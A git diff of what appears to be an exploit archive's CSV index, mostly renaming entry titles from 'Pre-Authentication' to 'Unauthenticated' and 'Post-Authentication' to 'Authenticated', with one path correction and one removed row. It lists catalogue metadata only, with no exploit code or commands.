diff --git a/files.csv b/files.csv
index 4c75ea246..650da3f74 100755
--- a/files.csv
+++ b/files.csv
@@ -338,7 +338,7 @@ id,file,description,date,author,platform,type,port
 361,platforms/windows/remote/361.txt,"Flash FTP Server - Directory Traversal",2004-07-22,CoolICE,windows,remote,0
 362,platforms/windows/dos/362.sh,"Xitami Web Server - Denial of Service",2004-07-22,CoolICE,windows,dos,0
 363,platforms/hardware/dos/363.txt,"Conceptronic CADSLR1 Router - Denial of Service",2004-07-22,"Seth Alan Woolley",hardware,dos,0
-364,platforms/linux/remote/364.pl,"Samba 3.0.4 - SWAT Authorization Buffer Overflow",2004-07-22,"Noam Rathaus",linux,remote,901
+364,platforms/linux/remote/364.pl,"Samba 3.0.4 SWAT - Authorisation Buffer Overflow",2004-07-22,"Noam Rathaus",linux,remote,901
 365,platforms/windows/dos/365.html,"Microsoft Internet Explorer - Denial of Service (11 bytes)",2004-07-23,Phuong,windows,dos,0
 366,platforms/windows/dos/366.pl,"Microsoft Windows SMS 2.0 - Denial of Service",2004-07-24,MacDefender,windows,dos,0
 367,platforms/osx/local/367.txt,"Apple Mac OSX - Panther Internet Connect Privilege Escalation",2004-07-28,B-r00t,osx,local,0
@@ -589,7 +589,7 @@ id,file,description,date,author,platform,type,port
 761,platforms/windows/remote/761.cpp,"NodeManager Professional 2.00 - Buffer Overflow",2005-01-18,"Tan Chew Keong",windows,remote,162
 762,platforms/osx/dos/762.c,"Apple Mac OSX 10.3.7 - Input Validation Flaw parse_machfile() Denial of Service",2005-01-20,nemo,osx,dos,0
 763,platforms/linux/local/763.c,"fkey 0.0.2 - Local File Accessibility Exploit",2005-01-20,vade79,linux,local,79
-764,platforms/linux/remote/764.c,"Apache OpenSSL - 'OpenFuckV2.c' Remote Exploit",2003-04-04,spabam,linux,remote,80
+764,platforms/unix/remote/764.c,"Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuckV2.c' Remote Exploit (2)",2003-04-04,spabam,unix,remote,80
 765,platforms/windows/remote/765.c,"Microsoft Internet Explorer - '.ANI' files handling Universal Exploit (MS05-002)",2005-01-22,houseofdabus,windows,remote,0
 766,platforms/osx/local/766.c,"Apple Mac OSX 10.3.7 - mRouter Privilege Escalation",2005-01-22,nemo,osx,local,0
 767,platforms/windows/remote/767.pl,"Golden FTP Server 2.02b - Remote Buffer Overflow",2005-01-22,Barabas,windows,remote,21
@@ -1050,7 +1050,7 @@ id,file,description,date,author,platform,type,port
 1256,platforms/multiple/dos/1256.pl,"Lynx 2.8.6dev.13 - Remote Buffer Overflow (PoC)",2005-10-17,"Ulf Harnhammar",multiple,dos,0
 1257,platforms/multiple/dos/1257.html,"Mozilla (Firefox 1.0.7) (Mozilla 1.7.12) - Denial of Service",2005-10-17,Kubbo,multiple,dos,0
 1258,platforms/linux/remote/1258.php,"e107 <= 0.6172 - (resetcore.php) SQL Injection",2005-10-18,rgod,linux,remote,0
-1259,platforms/hp-ux/remote/1259.pm,"HP-UX FTP Server - Pre-Authentication Directory Listing Exploit (Metasploit)",2005-10-19,Optyx,hp-ux,remote,0
+1259,platforms/hp-ux/remote/1259.pm,"HP-UX FTP Server - Unauthenticated Directory Listing Exploit (Metasploit)",2005-10-19,Optyx,hp-ux,remote,0
 1260,platforms/windows/remote/1260.pm,"Microsoft IIS - SA WebAgent 5.2/5.3 Redirect Overflow (Metasploit)",2005-10-19,"H D Moore",windows,remote,80
 1261,platforms/hp-ux/remote/1261.pm,"HP-UX 11.11 - lpd Remote Command Execution (Metasploit)",2005-10-19,"H D Moore",hp-ux,remote,515
 1262,platforms/windows/remote/1262.pm,"CA Unicenter 3.1 - CAM log_security() Stack Overflow (Metasploit)",2005-10-19,"H D Moore",windows,remote,4105
@@ -1123,7 +1123,7 @@ id,file,description,date,author,platform,type,port
 1346,platforms/windows/dos/1346.c,"Microsoft Windows Metafile - 'mtNoObjects' Denial of Service (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0
 1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 (x86) - (phgrafx) Local Buffer Overflow",2005-11-30,"p. minervini",qnx,local,0
 1352,platforms/windows/remote/1352.cpp,"Microsoft Windows - DTC Remote Exploit (PoC) (MS05-051) (2)",2005-12-01,Swan,windows,remote,0
-1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple Pre-Authentication Remote Stack Overflow (PoC)",2005-12-02,Sowhat,windows,dos,0
+1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple Unauthenticated Remote Stack Overflow (PoC)",2005-12-02,Sowhat,windows,dos,0
 1354,platforms/php/webapps/1354.php,"Zen Cart 1.2.6d - 'password_forgotten.php' SQL Injection",2005-12-02,rgod,php,webapps,0
 1355,platforms/linux/remote/1355.pl,"sobexsrv 1.0.0_pre3 Bluetooth - syslog() Remote Format String",2005-12-03,"Kevin Finisterre",linux,remote,0
 1356,platforms/php/webapps/1356.php,"DoceboLms 2.0.4 - connector.php Arbitrary File Upload",2005-12-04,rgod,php,webapps,0
@@ -1470,7 +1470,7 @@ id,file,description,date,author,platform,type,port
 1751,platforms/php/webapps/1751.php,"Limbo CMS 1.0.4.2 - 'catid' SQL Injection",2006-05-05,[Oo],php,webapps,0
 1752,platforms/php/webapps/1752.pl,"StatIt 4 - (statitpath) Remote File Inclusion",2006-05-05,IGNOR3,php,webapps,0
 1753,platforms/php/webapps/1753.txt,"TotalCalendar 2.30 - (inc) Remote File Inclusion",2006-05-05,Aesthetico,php,webapps,0
-1754,platforms/windows/dos/1754.py,"FileCOPA FTP Server 1.01 - (USER) Remote Pre-Authentication Denial of Service",2006-05-05,Bigeazer,windows,dos,0
+1754,platforms/windows/dos/1754.py,"FileCOPA FTP Server 1.01 - (USER) Remote Unauthenticated Denial of Service",2006-05-05,Bigeazer,windows,dos,0
 1755,platforms/cgi/webapps/1755.py,"AWStats 6.5 - (migrate) Remote Shell Command Injection",2006-05-06,redsand,cgi,webapps,0
 1756,platforms/php/webapps/1756.pl,"HiveMail 1.3 - (addressbook.add.php) Remote Code Execution",2006-05-06,[Oo],php,webapps,0
 1757,platforms/windows/dos/1757.c,"acFTP FTP Server 1.4 - (USER) Remote Denial of Service",2006-05-06,Omni,windows,dos,0
@@ -2894,7 +2894,6 @@ id,file,description,date,author,platform,type,port
 3221,platforms/php/webapps/3221.php,"GuppY 4.5.16 - Remote Commands Execution Exploit",2007-01-29,rgod,php,webapps,0
 3222,platforms/php/webapps/3222.txt,"Webfwlog 0.92 - (debug.php) Remote File Disclosure",2007-01-29,GoLd_M,php,webapps,0
 3223,platforms/cgi/dos/3223.pl,"CVSTrac 2.0.0 - Defacement Denial of Service",2007-01-29,"Ralf S. Engelschall",cgi,dos,0
-40341,platforms/windows/local/40341.txt,"Multiple Applications - Local Credentials Disclosure",2016-09-07,"Yakir Wizman",windows,local,0
 3224,platforms/windows/dos/3224.c,"Intel 2200BG 802.11 - disassociation packet Kernel Memory Corruption",2007-01-29,"Breno Silva Pinto",windows,dos,0
 3225,platforms/php/webapps/3225.pl,"Galeria Zdjec 3.0 - (zd_numer.php) Local File Inclusion",2007-01-30,ajann,php,webapps,0
 3226,platforms/php/webapps/3226.txt,"PHPFootball 1.6 - (show.php) Remote Database Disclosure",2007-01-30,ajann,php,webapps,0
@@ -3076,7 +3075,7 @@ id,file,description,date,author,platform,type,port
 3404,platforms/multiple/dos/3404.php,"PHP - wddx_deserialize() String Append Crash",2007-03-04,"Stefan Esser",multiple,dos,0
 3405,platforms/multiple/remote/3405.txt,"PHP 4.4.3 - 4.4.6 PHPinfo() Remote Cross-Site Scripting",2007-03-04,"Stefan Esser",multiple,remote,0
 3406,platforms/php/webapps/3406.pl,"News-Letterman 1.1 - (eintrag.php sqllog) Remote File Inclusion",2007-03-04,bd0rk,php,webapps,0
-3407,platforms/multiple/dos/3407.c,"Asterisk 1.2.15 / 1.4.0 - Pre-Authentication Remote Denial of Service",2007-03-04,fbffff,multiple,dos,0
+3407,platforms/multiple/dos/3407.c,"Asterisk 1.2.15 / 1.4.0 - Unauthenticated Remote Denial of Service",2007-03-04,fbffff,multiple,dos,0
 3408,platforms/php/webapps/3408.pl,"AJ Auction Pro - 'subcat.php' SQL Injection",2007-03-04,ajann,php,webapps,0
 3409,platforms/php/webapps/3409.htm,"AJ Dating 1.0 - (view_profile.php) SQL Injection",2007-03-04,ajann,php,webapps,0
 3410,platforms/php/webapps/3410.htm,"AJ Classifieds 1.0 - (postingdetails.php) SQL Injection",2007-03-04,ajann,php,webapps,0
@@ -3279,7 +3278,7 @@ id,file,description,date,author,platform,type,port
 3613,platforms/php/webapps/3613.txt,"phpBB MOD Forum picture and META tags 1.7 - Remote File Inclusion",2007-03-30,bd0rk,php,webapps,0
 3614,platforms/php/webapps/3614.txt,"JSBoard 2.0.10 - (login.php table) Local File Inclusion",2007-03-30,GoLd_M,php,webapps,0
 3615,platforms/linux/remote/3615.c,"dproxy-nexgen (Linux/x86) - Remote Root Buffer Overflow",2007-03-30,mu-b,linux,remote,53
-3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - Pre-Authentication Remote Exploit",2007-03-31,muts,windows,remote,143
+3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - Unauthenticated Remote Exploit",2007-03-31,muts,windows,remote,143
 3617,platforms/windows/local/3617.cpp,"Microsoft Windows - Animated Cursor '.ani' Stack Overflow",2007-03-31,devcode,windows,local,0
 3618,platforms/php/webapps/3618.htm,"XOOPS Module Lykos Reviews 1.00 - 'index.php' SQL Injection",2007-03-31,ajann,php,webapps,0
 3619,platforms/php/webapps/3619.pl,"XOOPS Module Library - 'viewcat.php' SQL Injection",2007-03-31,ajann,php,webapps,0
@@ -3310,7 +3309,7 @@ id,file,description,date,author,platform,type,port
 3647,platforms/windows/local/3647.c,"Microsoft Windows - Animated Cursor '.ani' Local Buffer Overflow",2007-04-02,Marsu,windows,local,0
 3648,platforms/windows/local/3648.c,"Irfanview 3.99 - '.ani' Local Buffer Overflow (1)",2007-04-02,Marsu,windows,local,0
 3649,platforms/windows/local/3649.c,"Ipswitch WS_FTP 5.05 - Server Manager Local Site Buffer Overflow",2007-04-02,Marsu,windows,local,0
-3650,platforms/windows/remote/3650.c,"Frontbase 4.2.7 - Post-Authentication Remote Buffer Overflow (2.2)",2007-04-02,Heretic2,windows,remote,0
+3650,platforms/windows/remote/3650.c,"Frontbase 4.2.7 - Authenticated Remote Buffer Overflow (2.2)",2007-04-02,Heretic2,windows,remote,0
 3651,platforms/windows/remote/3651.txt,"Microsoft Windows - Animated Cursor '.ani' Universal Exploit Generator",2007-04-03,"YAG KOHHA",windows,remote,0
 3652,platforms/windows/local/3652.c,"Microsoft Windows - Animated Cursor '.ani' Overflow (Hardware DEP)",2007-04-03,devcode,windows,local,0
 3653,platforms/php/webapps/3653.php,"MyBulletinBoard (MyBB) 1.2.3 - Remote Code Execution",2007-04-03,DarkFig,php,webapps,0
@@ -3682,7 +3681,7 @@ id,file,description,date,author,platform,type,port
 4024,platforms/windows/local/4024.rb,"DVD X Player 4.1 Professional - '.PLF' File Buffer Overflow",2007-06-02,n00b,windows,local,0
 4025,platforms/php/webapps/4025.php,"Quick.Cart 2.2 - Remote File Inclusion / Local File Inclusion Remote Code Execution",2007-06-02,Kacper,php,webapps,0
 4026,platforms/php/webapps/4026.php,"PNPHPBB2 <= 1.2 - (index.php c) SQL Injection",2007-06-03,Kacper,php,webapps,0
-4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager - Pre-Authentication Remote Exploit",2007-06-03,muts,windows,remote,8080
+4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager - Unauthenticated Remote Exploit",2007-06-03,muts,windows,remote,8080
 4028,platforms/linux/local/4028.txt,"Screen 4.0.3 (OpenBSD) - Local Authentication Bypass",2008-06-18,Rembrandt,linux,local,0
 4029,platforms/php/webapps/4029.php,"Sendcard 3.4.1 - (Local File Inclusion) Remote Code Execution",2007-06-04,Silentz,php,webapps,0
 4030,platforms/php/webapps/4030.php,"EQdkp 1.3.2 - (listmembers.php rank) SQL Injection",2007-06-04,Silentz,php,webapps,0
@@ -3943,14 +3942,14 @@ id,file,description,date,author,platform,type,port
 4291,platforms/php/webapps/4291.txt,"GetMyOwnArcade - 'search.php query' SQL Injection",2007-08-16,RoXur777,php,webapps,0
 4292,platforms/windows/remote/4292.cpp,"Diskeeper 9 - Remote Memory Disclosure",2007-08-17,Pravus,windows,remote,0
 4293,platforms/windows/dos/4293.php,"PHP 5.2.0 (Windows/x86) - (PHP_win32sti) Local Buffer Overflow (PoC)",2007-08-18,boecke,windows,dos,0
-4294,platforms/windows/dos/4294.pl,"Mercury SMTPD - Remote Pre-Authentication Stack Based Overrun (PoC)",2007-08-18,eliteboy,windows,dos,0
+4294,platforms/windows/dos/4294.pl,"Mercury SMTPD - Remote Unauthenticated Stack Based Overrun (PoC)",2007-08-18,eliteboy,windows,dos,0
 4295,platforms/php/webapps/4295.txt,"Squirrelcart 1.x.x - (cart.php) Remote File Inclusion",2007-08-19,ShaiMagal,php,webapps,0
 4296,platforms/php/webapps/4296.txt,"Mambo Component SimpleFAQ 2.11 - SQL Injection",2007-08-20,k1tk4t,php,webapps,0
 4297,platforms/hardware/dos/4297.pl,"Cisco IP Phone 7940 - (3 SIP Messages) Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0
 4298,platforms/hardware/dos/4298.pl,"Cisco IP Phone 7940 - (10 SIP Messages) Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0
 4299,platforms/windows/remote/4299.html,"eCentrex VOIP Client module - (uacomx.ocx 2.0.1) Remote Buffer Overflow",2007-08-21,rgod,windows,remote,0
 4300,platforms/php/webapps/4300.txt,"litecommerce 2004 - (category_id) SQL Injection",2007-08-21,k1tk4t,php,webapps,0
-4301,platforms/windows/remote/4301.cpp,"Mercury/32 4.51 - SMTPD CRAM-MD5 Pre-Authentication Remote Overflow",2007-08-22,ZhenHan.Liu,windows,remote,25
+4301,platforms/windows/remote/4301.cpp,"Mercury/32 4.51 - SMTPD CRAM-MD5 Unauthenticated Remote Overflow",2007-08-22,ZhenHan.Liu,windows,remote,25
 4302,platforms/windows/local/4302.php,"PHP 5.2.3 - (PHP_win32sti) Local Buffer Overflow (1)",2007-08-22,Inphex,windows,local,0
 4303,platforms/windows/local/4303.php,"PHP 5.2.3 - (PHP_win32sti) Local Buffer Overflow (2)",2007-08-22,NetJackal,windows,local,0
 4304,platforms/windows/dos/4304.php,"PHP 5.2.3 - PHP_ntuser ntuser_getuserlist() Local Buffer Overflow (PoC)",2007-08-23,shinnai,windows,dos,0
@@ -3964,8 +3963,8 @@ id,file,description,date,author,platform,type,port
 4312,platforms/linux/remote/4312.c,"ProFTPd 1.x (module mod_tls) - Remote Buffer Overflow",2007-08-24,netris,linux,remote,21
 4313,platforms/php/webapps/4313.pl,"SunShop 4.0 RC 6 - 'Search' Blind SQL Injection",2007-08-25,k1tk4t,php,webapps,0
 4314,platforms/windows/local/4314.php,"PHP Perl Extension - Safe_mode BypassExploit",2007-08-25,NetJackal,windows,local,0
-4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server - Pre-Authentication Remote Buffer Overflow",2007-08-25,"Joxean Koret",linux,remote,389
-4316,platforms/windows/remote/4316.cpp,"Mercury/32 3.32-4.51 - SMTP Pre-Authentication EIP Overwrite",2007-08-26,Heretic2,windows,remote,25
+4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server - Unauthenticated Remote Buffer Overflow",2007-08-25,"Joxean Koret",linux,remote,389
+4316,platforms/windows/remote/4316.cpp,"Mercury/32 3.32-4.51 - SMTP Unauthenticated EIP Overwrite",2007-08-26,Heretic2,windows,remote,25
 4317,platforms/php/webapps/4317.txt,"2532/Gigs 1.2.1 - (activateuser.php) Local File Inclusion",2007-08-26,bd0rk,php,webapps,0
 4318,platforms/windows/dos/4318.php,"PHP 5.2.0 (Windows/x86) - (PHP_iisfunc.dll) Local Buffer Overflow (PoC)",2007-08-27,boecke,windows,dos,0
 4319,platforms/hardware/dos/4319.pl,"Thomson SIP phone ST 2030 - Remote Denial of Service",2007-08-27,MADYNES,hardware,dos,0
@@ -3993,7 +3992,7 @@ id,file,description,date,author,platform,type,port
 4341,platforms/php/webapps/4341.txt,"Pakupaku CMS 0.4 - Arbitrary File Upload / Local File Inclusion",2007-08-29,GoLd_M,php,webapps,0
 4342,platforms/php/webapps/4342.txt,"NMDeluxe 2.0.0 - 'id' SQL Injection",2007-08-30,"not sec group",php,webapps,0
 4343,platforms/cgi/webapps/4343.txt,"Ourspace 2.0.9 - (uploadmedia.cgi) Arbitrary File Upload",2007-08-30,Don,cgi,webapps,0
-4344,platforms/windows/dos/4344.php,"Hexamail Server 3.0.0.001 - (pop3) Pre-Authentication Remote Overflow (PoC)",2007-08-30,rgod,windows,dos,0
+4344,platforms/windows/dos/4344.php,"Hexamail Server 3.0.0.001 - (pop3) Unauthenticated Remote Overflow (PoC)",2007-08-30,rgod,windows,dos,0
 4345,platforms/windows/local/4345.c,"Norman Virus Control - nvcoaft51.sys ioctl BF672028 Exploit",2007-08-30,inocraM,windows,local,0
 4346,platforms/php/webapps/4346.pl,"phpBB Links MOD 1.2.2 - SQL Injection",2007-08-31,Don,php,webapps,0
 4347,platforms/linux/dos/4347.pl,"Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop Exploit",2007-08-31,"Beyond Security",linux,dos,0
@@ -4074,10 +4073,10 @@ id,file,description,date,author,platform,type,port
 4423,platforms/php/webapps/4423.txt,"modifyform - 'modifyform.html' Remote File Inclusion",2007-09-18,mozi,php,webapps,0
 4424,platforms/windows/remote/4424.html,"Apple QuickTime /w IE .qtl Version XAS - Remote Exploit (PoC)",2007-09-18,"Aviv Raff",windows,remote,0
 4425,platforms/php/webapps/4425.pl,"phpBB Mod Ktauber.com StylesDemo - Blind SQL Injection",2007-09-18,nexen,php,webapps,0
-4426,platforms/hardware/dos/4426.pl,"Airsensor M520 - HTTPD Remote Pre-Authentication Denial of Service / Buffer Overflow (PoC)",2007-09-18,"Alex Hernandez",hardware,dos,0
+4426,platforms/hardware/dos/4426.pl,"Airsensor M520 - HTTPD Remote Unauthenticated Denial of Service / Buffer Overflow (PoC)",2007-09-18,"Alex Hernandez",hardware,dos,0
 4427,platforms/windows/remote/4427.html,"jetAudio 7.x - ActiveX DownloadFromMusicStore() Code Execution",2007-09-19,h07,windows,remote,0
 4428,platforms/windows/remote/4428.html,"Yahoo! Messenger 8.1.0.421 - CYFT Object Arbitrary File Download",2007-09-19,shinnai,windows,remote,0
-4429,platforms/windows/remote/4429.pl,"Mercury/32 4.52 IMAPD - SEARCH command Post-Authentication Overflow",2007-09-19,void,windows,remote,143
+4429,platforms/windows/remote/4429.pl,"Mercury/32 4.52 IMAPD - SEARCH command Authenticated Overflow",2007-09-19,void,windows,remote,143
 4430,platforms/php/webapps/4430.txt,"Streamline PHP Media Server 1.0-beta4 - Remote File Inclusion",2007-09-19,BiNgZa,php,webapps,0
 4431,platforms/windows/local/4431.py,"Microsoft Visual Basic Enterprise Edition 6.0 SP6 - Code Execution",2007-09-19,shinnai,windows,local,0
 4432,platforms/multiple/dos/4432.html,"Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow (PoC)",2007-09-19,"YAG KOHHA",multiple,dos,0
@@ -4521,8 +4520,8 @@ id,file,description,date,author,platform,type,port
 4873,platforms/windows/remote/4873.html,"Microsoft FoxServer - (vfp6r.dll 6.0.8862.0) ActiveX Command Execution",2008-01-09,shinnai,windows,remote,0
 4874,platforms/windows/remote/4874.html,"Microsoft Rich Textbox Control 6.0 - (SP6) SaveFile() Insecure Method",2008-01-09,shinnai,windows,remote,0
 4876,platforms/php/webapps/4876.txt,"Tuned Studios Templates - Local File Inclusion",2008-01-09,DSecRG,php,webapps,0
-4877,platforms/multiple/remote/4877.txt,"SAP MaxDB 7.6.03.07 - Pre-Authentication Remote Command Execution",2008-01-09,"Luigi Auriemma",multiple,remote,7210
-4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server - Remote Pre-Authentication Code Execution / Denial of Service (PoC)",2008-01-09,"Leon Juranic",multiple,dos,0
+4877,platforms/multiple/remote/4877.txt,"SAP MaxDB 7.6.03.07 - Unauthenticated Remote Command Execution",2008-01-09,"Luigi Auriemma",multiple,remote,7210
+4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server - Remote Unauthenticated Code Execution / Denial of Service (PoC)",2008-01-09,"Leon Juranic",multiple,dos,0
 4879,platforms/php/webapps/4879.php,"Docebo 3.5.0.3 - (lib.regset.php) Command Execution",2008-01-09,EgiX,php,webapps,0
 4880,platforms/php/webapps/4880.php,"DomPHP 0.81 - Remote Add Administrator Exploit",2008-01-10,j0j0,php,webapps,0
 4881,platforms/solaris/dos/4881.c,"SunOS 5.10 - Remote ICMP Kernel Crash",2008-01-10,kingcope,solaris,dos,0
@@ -4889,7 +4888,7 @@ id,file,description,date,author,platform,type,port
 5246,platforms/php/webapps/5246.txt,"EasyCalendar 4.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0
 5247,platforms/php/webapps/5247.txt,"easygallery 5.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0
 5248,platforms/windows/remote/5248.py,"MDaemon IMAP server 9.6.4 - (FETCH) Remote Buffer Overflow",2008-03-13,ryujin,windows,remote,143
-5249,platforms/windows/remote/5249.pl,"MailEnable Pro/Ent 3.13 - (Fetch) Post-Authentication Remote Buffer Overflow",2008-03-14,haluznik,windows,remote,0
+5249,platforms/windows/remote/5249.pl,"MailEnable Pro/Ent 3.13 - (Fetch) Authenticated Remote Buffer Overflow",2008-03-14,haluznik,windows,remote,0
 5250,platforms/windows/local/5250.cpp,"VLC 0.8.6e - Subtitle Parsing Local Buffer Overflow",2008-03-14,"Mai Xuan Cuong",windows,local,0
 5252,platforms/php/webapps/5252.txt,"eXV2 Module MyAnnonces - (lid) SQL Injection",2008-03-14,S@BUN,php,webapps,0
 5253,platforms/php/webapps/5253.txt,"eXV2 Module eblog 1.2 - (blog_id) SQL Injection",2008-03-14,S@BUN,php,webapps,0
@@ -4898,7 +4897,7 @@ id,file,description,date,author,platform,type,port
 5256,platforms/php/webapps/5256.pl,"AuraCMS 2.2.1 - (online.php) Blind SQL Injection",2008-03-14,NTOS-Team,php,webapps,0
 5257,platforms/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure",2008-03-14,kingcope,multiple,remote,0
 5258,platforms/solaris/dos/5258.c,"SunOS 5.10 Sun Cluster - rpc.metad Denial of Service (PoC)",2008-03-14,kingcope,solaris,dos,0
-5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP Post-Authentication Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143
+5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP Authenticated Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143
 5260,platforms/php/webapps/5260.txt,"Fuzzylime CMS 3.01 - (admindir) Remote File Inclusion",2008-03-14,irk4z,php,webapps,0
 5261,platforms/windows/dos/5261.py,"Rosoft Media Player 4.1.8 - RML Stack Based Buffer Overflow (PoC)",2008-03-15,"Wiktor Sierocinski",windows,dos,0
 5262,platforms/php/webapps/5262.txt,"mutiple timesheets 5.0 - Multiple Vulnerabilities",2008-03-16,JosS,php,webapps,0
@@ -4978,7 +4977,7 @@ id,file,description,date,author,platform,type,port
 5339,platforms/php/webapps/5339.php,"Nuked-klaN 1.7.6 - Multiple Vulnerabilities",2008-04-01,"Charles Fol",php,webapps,0
 5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 - SQL Injection",2008-04-01,DreamTurk,php,webapps,0
 5341,platforms/windows/dos/5341.pl,"Noticeware Email Server 4.6.1.0 - Denial of Service",2008-04-01,Ray,windows,dos,0
-5342,platforms/windows/remote/5342.py,"HP OpenView NNM 7.5.1 - OVAS.exe SEH Pre-Authentication Overflow",2008-04-02,muts,windows,remote,7510
+5342,platforms/windows/remote/5342.py,"HP OpenView NNM 7.5.1 - OVAS.exe SEH Unauthenticated Overflow",2008-04-02,muts,windows,remote,7510
 5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service",2008-04-02,muts,windows,dos,0
 5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP - Denial of Service",2008-04-02,muts,windows,dos,0
 5345,platforms/php/webapps/5345.txt,"Joomla Component OnlineFlashQuiz 1.0.2 - Remote File Inclusion",2008-04-02,NoGe,php,webapps,0
@@ -5086,7 +5085,7 @@ id,file,description,date,author,platform,type,port
 5448,platforms/php/webapps/5448.txt,"Koobi Pro 6.25 - poll SQL Injection",2008-04-14,S@BUN,php,webapps,0
 5449,platforms/php/webapps/5449.php,"KwsPHP - (Upload) Remote Code Execution",2008-04-14,Ajax,php,webapps,0
 5450,platforms/php/webapps/5450.txt,"Classifieds Caffe - 'index.php cat_id' SQL Injection",2008-04-15,JosS,php,webapps,0
-5451,platforms/windows/remote/5451.py,"BigAnt Server 2.2 - Pre-Authentication Remote SEH Overflow",2008-04-15,ryujin,windows,remote,6080
+5451,platforms/windows/remote/5451.py,"BigAnt Server 2.2 - Unauthenticated Remote SEH Overflow",2008-04-15,ryujin,windows,remote,6080
 5452,platforms/php/webapps/5452.txt,"lightneasy sqlite / no database 1.2.2 - Multiple Vulnerabilities",2008-04-15,girex,php,webapps,0
 5453,platforms/windows/dos/5453.pl,"DivX Player 6.7.0 - '.srt' File Buffer Overflow (PoC)",2008-04-15,securfrog,windows,dos,0
 5454,platforms/php/webapps/5454.txt,"Lasernet CMS 1.5 - SQL Injection (2)",2008-04-15,cO2,php,webapps,0
@@ -5128,7 +5127,7 @@ id,file,description,date,author,platform,type,port
 5490,platforms/php/webapps/5490.pl,"YouTube Clone Script - 'spages.php' Remote Code Execution",2008-04-23,Inphex,php,webapps,0
 5491,platforms/php/webapps/5491.txt,"Joomla Community Builder 1.0.1 - Blind SQL Injection",2008-04-23,$hur!k'n,php,webapps,0
 5492,platforms/windows/local/5492.cpp,"DivX Player 6.7 - '.srt' File Subtitle Parsing Buffer Overflow",2008-04-24,lhoang8500,windows,local,0
-5493,platforms/php/webapps/5493.txt,"Joomla Component JPad 1.0 - Post-Authentication SQL Injection",2008-04-24,His0k4,php,webapps,0
+5493,platforms/php/webapps/5493.txt,"Joomla Component JPad 1.0 - Authenticated SQL Injection",2008-04-24,His0k4,php,webapps,0
 5494,platforms/php/webapps/5494.txt,"minibb 2.2 - (Cross-Site Scripting / SQL Injection / Full Path Disclosure) Multiple Vulnerabilities",2008-04-25,girex,php,webapps,0
 5495,platforms/php/webapps/5495.txt,"PostNuke Module PostSchedule - (eid) SQL Injection",2008-04-25,Kacper,php,webapps,0
 5496,platforms/windows/remote/5496.html,"Watchfire Appscan 7.0 - ActiveX Multiple Insecure Methods",2008-04-25,callAX,windows,remote,0
@@ -5228,7 +5227,7 @@ id,file,description,date,author,platform,type,port
 5597,platforms/php/webapps/5597.pl,"Battle.net Clan Script 1.5.x - SQL Injection",2008-05-12,Stack,php,webapps,0
 5598,platforms/php/webapps/5598.txt,"Mega File Hosting Script 1.2 - (fid) SQL Injection",2008-05-12,TurkishWarriorr,php,webapps,0
 5599,platforms/php/webapps/5599.txt,"PHP Classifieds Script 05122008 - SQL Injection",2008-05-12,InjEctOr5,php,webapps,0
-5600,platforms/php/webapps/5600.php,"CMS Made Simple 1.2.4 - (FileManager module) File Upload",2008-05-12,EgiX,php,webapps,0
+5600,platforms/php/webapps/5600.php,"CMS Made Simple 1.2.4 - (FileManager module) Arbitrary File Upload",2008-05-12,EgiX,php,webapps,0
 5601,platforms/php/webapps/5601.pl,"Advanced Image Hosting (AIH) 2.1 - SQL Injection",2008-05-12,Stack,php,webapps,0
 5602,platforms/php/webapps/5602.txt,"AJ HYIP ACME - 'topic_detail.php id' SQL Injection",2008-05-12,InjEctOr5,php,webapps,0
 5603,platforms/php/webapps/5603.txt,"EQDKP 1.3.2f - (user_id) Authentication Bypass (PoC)",2008-05-13,vortfu,php,webapps,0
@@ -5336,7 +5335,7 @@ id,file,description,date,author,platform,type,port
 5706,platforms/php/webapps/5706.php,"EasyWay CMS - 'index.php mid' SQL Injection",2008-05-31,Lidloses_Auge,php,webapps,0
 5707,platforms/php/webapps/5707.txt,"Social Site Generator - (path) Remote File Inclusion",2008-05-31,vBmad,php,webapps,0
 5708,platforms/php/webapps/5708.txt,"Joomla Component prayercenter 1.4.9 - 'id' SQL Injection",2008-05-31,His0k4,php,webapps,0
-5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC (Post-Authentication)",2008-05-31,securfrog,windows,dos,0
+5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC (Authenticated)",2008-05-31,securfrog,windows,dos,0
 5710,platforms/php/webapps/5710.pl,"Joomla Component com_biblestudy 1.5.0 - 'id' SQL Injection",2008-05-31,Stack,php,webapps,0
 5711,platforms/php/webapps/5711.txt,"Social Site Generator 2.0 - Multiple Remote File Disclosure Vulnerabilities",2008-06-01,Stack,php,webapps,0
 5712,platforms/multiple/dos/5712.pl,"Samba (client) - receive_smb_raw() Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0
@@ -5376,7 +5375,7 @@ id,file,description,date,author,platform,type,port
 5748,platforms/php/webapps/5748.txt,"Joomla Component JoomlaDate - (user) SQL Injection",2008-06-05,His0k4,php,webapps,0
